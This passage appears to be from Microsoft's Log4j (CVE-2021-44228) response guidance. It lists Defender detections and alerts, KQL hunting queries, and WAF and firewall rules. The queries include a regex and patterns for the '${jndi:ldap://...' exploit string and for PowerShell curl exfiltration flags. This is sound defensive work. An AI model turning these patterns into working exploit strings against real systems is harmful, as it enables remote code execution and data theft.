 * Vulnerability assessment findings – Organizations that have enabled any of the vulnerability assessment tools (whether it's Microsoft Defender for Endpoint's [threat and vulnerability management](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-tvm>) module, the [built-in Qualys scanner](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-vm>), or a [bring your own license solution](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-byol-vm>)) can search by CVE identifier:

_Figure 9. Searching vulnerability assessment findings by CVE identifier_

 * Software inventory – With the combined [integration with Microsoft Defender for Endpoint](<https://docs.microsoft.com/azure/defender-for-cloud/integration-defender-for-endpoint>) and [Microsoft Defender for servers](<https://docs.microsoft.com/azure/defender-for-cloud/defender-for-servers-introduction>), organizations can search for resources by installed applications and discover resources running the vulnerable software:

_Figure 10. Searching software inventory by installed applications_

Note that this doesn't replace a search of your codebase.
It's possible that software with integrated Log4j libraries won't appear in this list, but this is helpful in the initial triage of investigations related to this incident. For more information about how Microsoft Defender for Cloud finds machines affected by CVE-2021-44228, read this [tech community post](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-cloud/how-defender-for-cloud-finds-machines-affected-by-log4j/ba-p/3037271>).

#### Microsoft Defender for Containers

Microsoft Defender for Containers is capable of discovering images affected by the vulnerabilities recently discovered in Log4j 2: [CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>), and [CVE-2021-45105](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>). Images are automatically scanned for vulnerabilities in three different use cases: when pushed to an Azure container registry, when pulled from an Azure container registry, and when container images are running on a Kubernetes cluster. Additional information on supported scan triggers and Kubernetes clusters can be found [here](<https://docs.microsoft.com/azure/defender-for-cloud/defender-for-containers-introduction?tabs=defender-for-container-arch-aks>).

Log4j binaries are discovered whether they are deployed via a package manager, copied to the image as stand-alone binaries, or included within a JAR archive (up to one level of nesting).

We will continue to follow up on any additional developments and will update our detection capabilities if any additional vulnerabilities are reported.

**Finding affected images**

To find vulnerable images across registries using the Azure portal, navigate to the **Microsoft Defender for Cloud** service in the Azure portal.
Open the **Container Registry images should have vulnerability findings resolved** recommendation and search findings for the relevant CVEs.

_Figure 11. Finding images with the CVE-2021-45046 vulnerability_

**Find vulnerable running images on Azure portal [preview]**

To view only vulnerable images that are currently running on a Kubernetes cluster using the Azure portal, navigate to the **Microsoft Defender for Cloud** service in the Azure portal. Open the **Vulnerabilities in running container images should be remediated (powered by Qualys)** recommendation and search findings for the relevant CVEs:

_Figure 12. Finding running images with the CVE-2021-45046 vulnerability_

Note: This recommendation requires clusters to run the Microsoft Defender security profile to provide visibility on running images.

**Search Azure Resource Graph data**

Azure Resource Graph (ARG) provides instant access to resource information across cloud environments with robust filtering, grouping, and sorting capabilities. It's a quick and efficient way to query information across Azure subscriptions programmatically or from within the Azure portal. ARG provides another way to query resource data for resources found to be affected by the Log4j vulnerability.

The following query finds resources affected by the Log4j vulnerability across subscriptions.
Use the additional data field across all returned results to obtain details on vulnerable resources:

    securityresources
    | where type =~ "microsoft.security/assessments/subassessments"
    | extend assessmentKey=extract(@"(?i)providers/Microsoft.Security/assessments/([^/]*)", 1, id), subAssessmentId=tostring(properties.id), parentResourceId=extract("(.+)/providers/Microsoft.Security", 1, id)
    | extend Props = parse_json(properties)
    | extend additionalData = Props.additionalData
    | extend cves = additionalData.cve
    | where isnotempty(cves) and array_length(cves) > 0
    | mv-expand cves
    | where tostring(cves) has "CVE-2021-44228" or tostring(cves) has "CVE-2021-45046" or tostring(cves) has "CVE-2021-45105"

### Microsoft Sentinel queries

Microsoft Sentinel customers can use the following detection query to look for devices that have applications with the vulnerability:

 * [Vulnerable machines related to Log4j CVE-2021-44228](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityNestedRecommendation/Log4jVulnerableMachines.yaml>)

This query uses the Microsoft Defender for Cloud nested recommendations data to find machines vulnerable to Log4j CVE-2021-44228.

Microsoft Sentinel also provides a CVE-2021-44228 Log4Shell Research Lab Environment for testing the vulnerability: <https://github.com/OTRF/Microsoft-Sentinel2Go/tree/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell>

### RiskIQ EASM and Threat Intelligence

RiskIQ has published a few threat intelligence articles on this CVE, with mitigation guidance and IOCs. The latest one, with links to previous articles, can be found [here](<https://community.riskiq.com/article/67ba1386>). Both Community users and enterprise customers can search within the threat intelligence portal for data about potentially vulnerable components exposed to the Internet.
For example, it's possible to [surface all observed instances of Apache](<https://community.riskiq.com/search/components?category=Server&query=Apache>) or [Java](<https://community.riskiq.com/research?query=java>), including specific versions. Use this method of exploration to understand the larger Internet exposure, while also filtering down to what may impact you.

For a more automated method, registered users can view their attack surface to understand tailored findings associated with their organization. Note that you must be registered with a corporate email, and the automated attack surface will be limited. Digital Footprint customers can immediately understand what may be vulnerable and act swiftly and resolutely using the [Attack Surface Intelligence Dashboard](<https://app.riskiq.net/a/main/index#/dashboards/379/RiskIQ%20Attack%20Intelligence%20Dashboard>) Log4J Insights tab.

## Detecting and responding to exploitation attempts and other related attacker activity

### Microsoft 365 Defender

Microsoft 365 Defender coordinates multiple security solutions that detect components of observed attacks taking advantage of this vulnerability, from exploitation attempts to remote code execution and post-exploitation activity.

_Figure 13. Microsoft 365 Defender solutions protect against related threats_

Customers can click **Need help?** in the Microsoft 365 Defender portal to open a search widget. Customers can key in "Log4j" to search for in-portal resources, check if their network is affected, and work on corresponding actionable items to mitigate them.

#### Microsoft Defender Antivirus

Turn on cloud-delivered protection in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block the majority of new and unknown variants.
Microsoft Defender Antivirus detects components and behaviors related to this threat under the following detection names:

On Windows:

 * [Trojan:Win32/Capfetox.AA](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Capfetox.AA&threatId=-2147159827>) - detects attempted exploitation on the attacker machine
 * [HackTool:Win32/Capfetox.A!dha](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=HackTool:Win32/Capfetox.A!dha&threatId=-2147159807>) - detects attempted exploitation on the attacker machine
 * [VirTool:Win64/CobaltStrike.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=VirTool:Win64/CobaltStrike.A&threatId=-2147200161>), [TrojanDropper:PowerShell/Cobacis.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDropper:PowerShell/Cobacis.A&threatId=-2147200375>) - detects Cobalt Strike Beacon loaders
 * [TrojanDownloader:Win32/CoinMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Win32/CoinMiner&threatId=-2147257370>) - detects post-exploitation coin miner
 * [Trojan:Win32/WebToos.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/WebToos.A&threatId=-2147278986>) - detects post-exploitation PowerShell
 * [Ransom:MSIL/Khonsari.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:MSIL/Khonsari.A&threatId=-2147159485>) - detects a strain of the Khonsari ransomware family observed being distributed post-exploitation
 * [Trojan:Win64/DisguisedXMRigMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win64/DisguisedXMRigMiner&threatId=-2147169351>) - detects post-exploitation cryptocurrency miner
 * [TrojanDownloader:Java/Agent.S](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Java/Agent.S&threatId=-2147159796>) - detects suspicious class files used in post-exploitation
 * [TrojanDownloader:PowerShell/NitSky.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:PowerShell/NitSky.A&threatId=-2147157401>) - detects attempts to download Cobalt Strike Beacon payload

On Linux:

 * [Trojan:Linux/SuspectJavaExploit.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.A&threatId=-2147159829>), [Trojan:Linux/SuspectJavaExploit.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.B&threatId=-2147159828>), [Trojan:Linux/SuspectJavaExploit.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.C&threatId=-2147159808>) - blocks Java processes downloading and executing payload through output redirection
 * [Trojan:Linux/BashMiner.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.A&threatId=-2147159832>) - detects post-exploitation cryptocurrency miner
 * [TrojanDownloader:Linux/CoinMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/CoinMiner&threatId=-2147241315>) - detects post-exploitation cryptocurrency miner
 * [TrojanDownloader:Linux/Tusnami](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Tusnami.A&threatId=-2147159794>) - detects post-exploitation Backdoor Tsunami downloader
 * [Backdoor:Linux/Tusnami.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Tusnami.C!MTB&threatId=-2147178887>) - detects post-exploitation Tsunami backdoor
 * [Backdoor:Linux/Setag.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Setag.C&threatId=-2147277056>) - detects post-exploitation Gates backdoor
 * [Exploit:Linux/CVE-2021-44228.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Linux/CVE-2021-44228.A&threatId=-2147159804>), [Exploit:Linux/CVE-2021-44228.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Linux/CVE-2021-44228.B&threatId=-2147159803>) - detects exploitation
 * [TrojanDownloader:Linux/Capfetox.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Capfetox.A&threatId=-2147159639>), [TrojanDownloader:Linux/Capfetox.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Capfetox.B&threatId=-2147159640>)
 * [TrojanDownloader:Linux/ShAgnt!MSR](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/ShAgnt!MSR&threatId=-2147159432>), [TrojanDownloader:Linux/ShAgnt.A!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/ShAgnt.A!MTB&threatId=-2147159607>)
 * [Trojan:Linux/Kinsing.L](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/Kinsing.L&threatId=-2147189973>) - detects post-exploitation Kinsing cryptocurrency miner
 * [Trojan:Linux/Mirai.TS!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/Mirai.TS!MTB&threatId=-2147159629>) - detects post-exploitation Mirai malware capable of performing DDoS
 * [Backdoor:Linux/Dakkatoni.az!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Dakkatoni.az!MTB&threatId=-2147205141>) - detects post-exploitation Dakkatoni backdoor trojan capable of downloading more payloads
 * [Trojan:Linux/JavaExploitRevShell.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/JavaExploitRevShell.A&threatId=-2147159631>) - detects reverse shell attack post-exploitation
 * [Trojan:Linux/BashMiner.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.A&threatId=-2147159832>), [Trojan:Linux/BashMiner.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.B&threatId=-2147159820>) - detects post-exploitation cryptocurrency miner

#### Microsoft Defender for Endpoint

Users of Microsoft Defender for Endpoint can turn on the following attack surface reduction rule to block or audit some observed activity associated with this threat:

 * Block executable files from running unless they meet a prevalence, age, or trusted list criterion

Due to the broad range of network vectors through which this vulnerability can be exploited, and the fact that applying mitigations holistically across large environments will take time, we encourage defenders to look for signs of post-exploitation rather than fully relying on prevention. Observed post-exploitation activity such as coin mining, lateral movement, and Cobalt Strike is detected with behavior-based detections.

Alerts with the following titles in the Security Center indicate threat activity related to exploitation of the Log4j vulnerability on your network and should be immediately investigated and remediated.
These alerts are supported on both Windows and Linux platforms:

 * **Log4j exploitation detected** – detects known behaviors that attackers perform following successful exploitation of the CVE-2021-44228 vulnerability
 * **Log4j exploitation artifacts detected** (previously titled Possible exploitation of CVE-2021-44228) – detects coin miners, shells, backdoors, and payloads such as Cobalt Strike used by attackers post-exploitation
 * **Log4j exploitation network artifacts detected** (previously titled Network connection seen in CVE-2021-44228 exploitation) – detects network traffic connecting to an address associated with CVE-2021-44228 scanning or exploitation activity

The following alerts may indicate exploitation attempts or testing/scanning activity. Microsoft advises customers to investigate with caution, as these alerts don't necessarily indicate successful exploitation:

 * **Possible target of Log4j exploitation** – detects a possible attempt to exploit the remote code execution vulnerability in the Log4j component of an Apache server in communication _received by_ this device
 * **Possible target of Log4j vulnerability scanning** – detects a possible _attempt to scan_ for the remote code execution vulnerability in a Log4j component of an Apache server in communication received by this device
 * **Possible source of Log4j exploitation** – detects a possible attempt to exploit the remote code execution vulnerability in the Log4j component of an Apache server in communication _initiated from_ this device
 * **Possible Log4j exploitation** – detects multiple behaviors, including suspicious command launch post-exploitation
 * **Possible Log4j exploitation (CVE-2021-44228)** – inactive; initially covered several of the above, now replaced with more specific titles

The following alerts detect activities that have been observed in attacks that utilize at least one of the Log4j
vulnerabilities. However, these alerts can also indicate activity that is not related to the vulnerability. We are listing them here, as it is highly recommended that they are triaged and remediated immediately given their severity and the potential that they could be related to Log4j exploitation:

 * Suspicious remote PowerShell execution
 * Download of file associated with digital currency mining
 * Process associated with digital currency mining
 * Cobalt Strike command and control detected
 * Suspicious network traffic connection to C2 Server
 * Ongoing hands-on-keyboard attacker activity detected (Cobalt Strike)

Some of the alerts mentioned above utilize the enhanced network inspection capabilities in Microsoft Defender for Endpoint. These alerts correlate several network and endpoint signals into high-confidence detection of successful exploitation, as well as providing detailed evidence artifacts valuable for triage and investigation of detected activities.

_Figure 14. Example detection leveraging network inspection provides details about the Java class returned following successful exploitation_

#### Microsoft Defender for Cloud Apps (previously Microsoft Cloud App Security)

Microsoft 365 Defender detects exploitation patterns in different data sources, including cloud application traffic reported by Microsoft Defender for Cloud Apps. The following alert surfaces exploitation attempts via cloud applications that use vulnerable Log4j components:

 * Log4j exploitation attempt via cloud application (previously titled Exploitation attempt against Log4j (CVE-2021-44228))

_Figure 15.
Microsoft 365 Defender alert "Exploitation attempt against Log4j (CVE-2021-44228)"_

#### Microsoft Defender for Office 365

To add a layer of protection against exploits that may be delivered via email, Microsoft Defender for Office 365 flags suspicious emails (e.g., emails with the "jndi" string in email headers or the sender email address field), which are moved to the Junk folder.

We also added the following new alert, which detects attempts to exploit CVE-2021-44228 through email headers:

 * Log4j exploitation attempt via email (previously titled Log4j Exploitation Attempt – Email Headers (CVE-2021-44228))

_Figure 16. Sample alert on malicious sender display name found in email correspondence_

This detection looks for exploitation attempts in email headers, such as the sender display name, sender, and recipient addresses. The alert covers known obfuscation attempts that have been observed in the wild. If this alert is surfaced, customers are recommended to evaluate the source address, email subject, and file attachments to get more context regarding the authenticity of the email.

_Figure 17. Sample email with malicious sender display name_

In addition, this email event can also be surfaced via advanced hunting:

_Figure 18. Sample email event surfaced via advanced hunting_

#### Microsoft 365 Defender advanced hunting queries

To locate possible exploitation activity, run the following queries:

**Possible malicious indicators in cloud application events**

This query is designed to flag exploitation attempts for cases where the attacker is sending the crafted exploitation string using vectors such as User-Agent, Application, or Account name. The hits returned from this query are most likely unsuccessful attempts; however, the results can be useful to identify attacker details such as IP address, payload string, download URL, etc.

    CloudAppEvents
    | where Timestamp > datetime("2021-12-09")
    | where UserAgent contains "jndi:"
        or AccountDisplayName contains "jndi:"
        or Application contains "jndi:"
        or AdditionalFields contains "jndi:"
    | project ActionType, ActivityType, Application, AccountDisplayName, IPAddress, UserAgent, AdditionalFields

**Alerts related to Log4j vulnerability**

This query looks for alert activity pertaining to the Log4j vulnerability.

    AlertInfo
    | where Title in~('Suspicious script launched',
        'Exploitation attempt against Log4j (CVE-2021-44228)',
        'Suspicious process executed by a network service',
        'Possible target of Log4j exploitation (CVE-2021-44228)',
        'Possible target of Log4j exploitation',
        'Possible Log4j exploitation',
        'Network connection seen in CVE-2021-44228 exploitation',
        'Log4j exploitation detected',
        'Possible exploitation of CVE-2021-44228',
        'Possible target of Log4j vulnerability (CVE-2021-44228) scanning',
        'Possible source of Log4j exploitation',
        'Log4j exploitation attempt via cloud application', // Previously titled Exploitation attempt against Log4j
        'Log4j exploitation attempt via email' // Previously titled Log4j Exploitation Attempt
        )

**Devices with Log4j vulnerability alerts and additional other alert-related context**

This query surfaces devices with Log4j-related alerts and adds context from other alerts on the device.

    // Get any devices with Log4J related Alert Activity
    let DevicesLog4JAlerts = AlertInfo
    | where Title in~('Suspicious script launched',
        'Exploitation attempt against Log4j (CVE-2021-44228)',
        'Suspicious process executed by a network service',
        'Possible target of Log4j exploitation (CVE-2021-44228)',
        'Possible target of Log4j exploitation',
        'Possible Log4j exploitation',
        'Network connection seen in CVE-2021-44228 exploitation',
        'Log4j exploitation detected',
        'Possible exploitation of CVE-2021-44228',
        'Possible target of Log4j vulnerability (CVE-2021-44228) scanning',
        'Possible source of Log4j exploitation',
        'Log4j exploitation attempt via cloud application', // Previously titled Exploitation attempt against Log4j
        'Log4j exploitation attempt via email' // Previously titled Log4j Exploitation Attempt
        )
    // Join in evidence information
    | join AlertEvidence on AlertId
    | where DeviceId != ""
    | summarize by DeviceId, Title;
    // Get additional alert activity for each device
    AlertEvidence
    | where DeviceId in(DevicesLog4JAlerts)
    // Add additional info
    | join kind=leftouter AlertInfo on AlertId
    | summarize DeviceAlerts = make_set(Title), AlertIDs = make_set(AlertId) by DeviceId, bin(Timestamp, 1d)

**Suspected exploitation of Log4j vulnerability**

This query looks for exploitation of the vulnerability using known parameters in the malicious string.
It surfaces exploitation but may surface legitimate behavior in some environments.

    DeviceProcessEvents
    | where ProcessCommandLine has_all('${jndi') and ProcessCommandLine has_any('ldap', 'ldaps', 'http', 'rmi', 'dns', 'iiop')
    // Removing FPs
    | where not(ProcessCommandLine has_any('stackstorm', 'homebrew'))

**Regex to identify malicious exploit string**

This query looks for the malicious string needed to exploit this vulnerability.

    DeviceProcessEvents
    | where ProcessCommandLine matches regex @'(?i)\$\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop):\/\/(\$\{([a-z]){1,20}:([a-z]){1,20}\})?(([a-zA-Z0-9]|-){2,100})?(\.([a-zA-Z0-9]|-){2,100})?\.([a-zA-Z0-9]|-){2,100}\.([a-z0-9]){2,20}(\/).*}'
        or InitiatingProcessCommandLine matches regex @'(?i)\$\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop):\/\/(\$\{([a-z]){1,20}:([a-z]){1,20}\})?(([a-zA-Z0-9]|-){2,100})?(\.([a-zA-Z0-9]|-){2,100})?\.([a-zA-Z0-9]|-){2,100}\.([a-z0-9]){2,20}(\/).*}'

**Suspicious process event creation from VMware Horizon TomcatService**

This query identifies anomalous child processes of the _ws_TomcatService.exe_ process associated with the exploitation of the Log4j vulnerability in VMware Horizon installations. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.

    DeviceProcessEvents
    | where InitiatingProcessFileName has "ws_TomcatService.exe"
    | where FileName != "repadmin.exe"

**Suspicious JScript staging comment**

This query identifies a unique string present in malicious PowerShell commands attributed to threat actors exploiting vulnerable Log4j applications.
These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.

    DeviceProcessEvents
    | where FileName has "powershell.exe"
    | where ProcessCommandLine has "VMBlastSG"

**Suspicious PowerShell curl flags**

This query identifies unique, uncommon PowerShell flags used by curl to post the results of an attacker-executed command back to the command-and-control infrastructure. If the event is a true positive, the contents of the "Body" argument are Base64-encoded results from an attacker-issued command. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.

    DeviceProcessEvents
    | where FileName has "powershell.exe"
    | where ProcessCommandLine has_all("-met", "POST", "-Body")

### Microsoft Defender for Cloud

Microsoft Defender for Cloud's threat detection capabilities have been expanded to surface exploitation of CVE-2021-44228 in several relevant security alerts:

On Windows:

 * Detected obfuscated command line
 * Suspicious use of PowerShell detected

On Linux:

 * Suspicious file download
 * Possible Cryptocoinminer download detected
 * Process associated with digital currency mining detected
 * Potential crypto coin miner started
 * A history file has been cleared
 * Suspicious Shell Script Detected
 * Suspicious domain name reference
 * Digital currency mining related behavior detected
 * Behavior similar to common Linux bots detected

### Microsoft Defender for IoT

Microsoft Defender for IoT has released a dedicated threat intelligence update package for detecting Log4j 2 exploit attempts on the network (example below).

_Figure 19.
Microsoft Defender for IoT alert_

The package is available for download from the [Microsoft Defender for IoT portal](<https://ms.portal.azure.com/#blade/Microsoft_Azure_IoT_Defender/IoTDefenderDashboard/Getting_Started>) (click _Updates_, then _Download file_; MD5: 4fbc673742b9ca51a9721c682f404c41).

_Figure 20. Microsoft Defender for IoT sensor threat intelligence update_

Microsoft Defender for IoT now pushes new threat intelligence packages to cloud-connected sensors upon release; [click here](<https://docs.microsoft.com/en-us/azure/defender-for-iot/organizations/release-notes>) for more information. Starting with sensor version 10.3, users can automatically receive up-to-date threat intelligence packages through Microsoft Defender for IoT.

Working with automatic updates reduces operational effort and ensures greater security. Enable automatic updating on the [Defender for IoT portal](<https://ms.portal.azure.com/#blade/Microsoft_Azure_IoT_Defender/IoTDefenderDashboard/Sites>) by onboarding your cloud-connected sensor with the toggle for Automatic Threat Intelligence Updates turned on. For more information about threat intelligence packages in Defender for IoT, please refer to the [documentation](<https://docs.microsoft.com/en-us/azure/defender-for-iot/organizations/how-to-work-with-threat-intelligence-packages>).

### Microsoft Sentinel

A new Microsoft Sentinel solution has been added to the Content Hub that provides a central place to install Microsoft Sentinel-specific content to monitor, detect, and investigate signals related to exploitation of the CVE-2021-44228 vulnerability.

_Figure 21. Log4j Vulnerability Detection solution in Microsoft Sentinel_

To deploy this solution, in the Microsoft Sentinel portal, select **Content hub (Preview)** under **Content Management**, then search for **Log4j** in the search bar. Select the **Log4j vulnerability detection** solution, and click **Install**.
Learn how to [centrally discover and deploy Microsoft Sentinel out-of-the-box content and solutions](<https://docs.microsoft.com/azure/sentinel/sentinel-solutions-deploy>).

_Figure 22. Microsoft Sentinel Analytics showing detected Log4j vulnerability_

Note: We recommend that you check the solution for updates periodically, as new collateral may be added to this solution given the rapidly evolving situation. This can be verified on the main Content hub page.

#### Microsoft Sentinel queries

Microsoft Sentinel customers can use the following detection queries to look for this activity:

 * [Possible exploitation of Apache Log4j component detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Apache_log4j_Vulnerability.yaml>)

This hunting query looks for possible attempts to exploit a remote code execution vulnerability in the Log4j component of Apache. Attackers may attempt to launch arbitrary code by passing specific commands to a server, which are then logged and executed by the Log4j component.

 * [Cryptocurrency miners EXECVE](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/CryptoCurrencyMiners.yaml>)

This query hunts through EXECVE syslog data generated by AUOMS to find instances of cryptocurrency miners being downloaded.
It returns a table of suspicious command lines.

 * [Azure WAF Log4j CVE-2021-44228 hunting](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/AzureDiagnostics/WAF_log4j_vulnerability.yaml>)

This hunting query looks in Azure Web Application Firewall data to find possible exploitation attempts for CVE-2021-44228 involving the Log4j vulnerability.

 * [Log4j vulnerability exploit aka Log4Shell IP IOC](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Log4J_IPIOC_Dec112021.yaml>)

This hunting query identifies a match across various data feeds for IP IOCs related to the Log4j exploit described in CVE-2021-44228.

 * [Suspicious shell script detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Suspicious_ShellScript_Activity.yaml>)

This hunting query helps detect post-compromise suspicious shell scripts that attackers use for downloading and executing malicious files. This technique is often used by attackers and was recently used after exploiting the vulnerability in the Log4j component of Apache to evade detection, stay persistent, or carry out further exploitation in the network.

 * [Azure WAF matching for CVE-2021-44228 Log4j vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureDiagnostics/AzureWAFmatching_log4j_vuln.yaml>)

This query alerts on a positive pattern match by Azure WAF for a CVE-2021-44228 Log4j exploitation attempt.
If possible, it then decodes the malicious command for further analysis.\n\n * [Suspicious Base64 download activity detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Base64_Download_Activity.yaml>)\n\nThis hunting query helps detect suspicious encoded Base64 obfuscated scripts that attackers use to encode payloads for downloading and executing malicious files. This technique is often used by attackers and was recently used to the Log4j vulnerability in order to evade detection and stay persistent in the network.\n\n * _[Linux security-related process termination activity detected ](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Process_Termination_Activity.yaml>)_\n\nThis query alerts on attempts to terminate processes related to security monitoring. Attackers often try to terminate such processes post-compromise as seen recently to exploit the CVE-2021-44228 vulnerability.\n\n * [Suspicious manipulation of firewall detected via Syslog data](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Firewall_Disable_Activity.yaml>)\n\nThis query uses syslog data to alert on any suspicious manipulation of firewall to evade defenses. 
Attackers often perform such operations as seen recently to exploit the CVE-2021-44228 vulnerability for C2 communications or exfiltration.\n\n * [User agent search for Log4j exploitation attempt](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/UserAgentSearch_log4j.yaml>)\n\nThis query uses various log sources having user agent data to look for CVE-2021-44228 exploitation attempt based on user agent pattern.\n\n * [Network connections to LDAP port for CVE-2021-44228 vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/MultipleDataSources/NetworkConnectionldap_log4j.yaml>)\n\nThis hunting query looks for connection to LDAP port to find possible exploitation attempts for CVE-2021-44228.\n\n * [Linux toolkit detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Linux_Toolkit_Detected.yaml>)\n\nThis query uses syslog data to alert on any attack toolkits associated with massive scanning or exploitation attempts against a known vulnerability\n\n * [Container miner activity](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Container_Miner_Activity.yaml>)\n\nThis query uses syslog data to alert on possible artifacts associated with containers running images related to digital cryptocurrency mining.\n\n * [Network connection to new external LDAP server](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/CommonSecurityLog/NetworkConnectionToNewExternalLDAPServer.yaml>)\n\nThis query looks for outbound network connections using the LDAP protocol to external IP addresses, where that IP address has not had an LDAP network connection to it in the 14 days preceding the query timeframe. 
This could indicate someone exploiting a vulnerability such as CVE-2021-44228 to trigger the connection to a malicious LDAP server.

### Azure Firewall Premium

Customers using Azure Firewall Premium have enhanced protection from the Log4j RCE CVE-2021-44228 vulnerability and exploit. Azure Firewall Premium IDPS (Intrusion Detection and Prevention System) provides IDPS inspection for all east-west traffic and outbound traffic to the internet. The vulnerability rulesets are continuously updated and have included the CVE-2021-44228 vulnerability for different scenarios, including the UDP, TCP, and HTTP/S protocols, since December 10, 2021. The screenshot below shows all the scenarios that are actively mitigated by Azure Firewall Premium.

**Recommendation:** We recommend that customers configure [Azure Firewall Premium](<https://docs.microsoft.com/en-us/azure/firewall/premium-migrate>) with both IDPS Alert & Deny mode and TLS inspection enabled for proactive protection against the **CVE-2021-44228** exploit.

_Figure 23. Azure Firewall Premium portal_

Customers using Azure Firewall Standard can migrate to Premium by following [these directions](<https://docs.microsoft.com/en-us/azure/firewall/premium-migrate>). Customers new to Azure Firewall Premium can learn more about [Firewall Premium](<https://docs.microsoft.com/en-us/azure/firewall/premium-features>).

### Azure Web Application Firewall (WAF)

In response to this threat, Azure Web Application Firewall (WAF) has updated Default Rule Set (DRS) versions 1.0/1.1, available for Azure Front Door global deployments, and OWASP ModSecurity Core Rule Set (CRS) versions 3.0/3.1, available for Azure Application Gateway V2 regional deployments.

To help detect and mitigate the Log4Shell vulnerability by inspecting requests' headers, URI, and body, we have released the following:

 * For Azure Front Door deployments, we have updated the rule **944240 "Remote Command Execution"** under Managed Rules
 * For Azure Application Gateway V2 regional deployments, we have introduced a new rule **Known-CVEs/800100** in the rule group Known-CVEs under Managed Rules

These rules are already enabled by default in block mode for all existing WAF Default Rule Set (DRS) 1.0/1.1 and OWASP ModSecurity Core Rule Set (CRS) 3.0/3.1 configurations. Customers using WAF Managed Rules would have already received enhanced protection for the Log4j 2 vulnerabilities ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228>) and [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)); no additional action is needed.

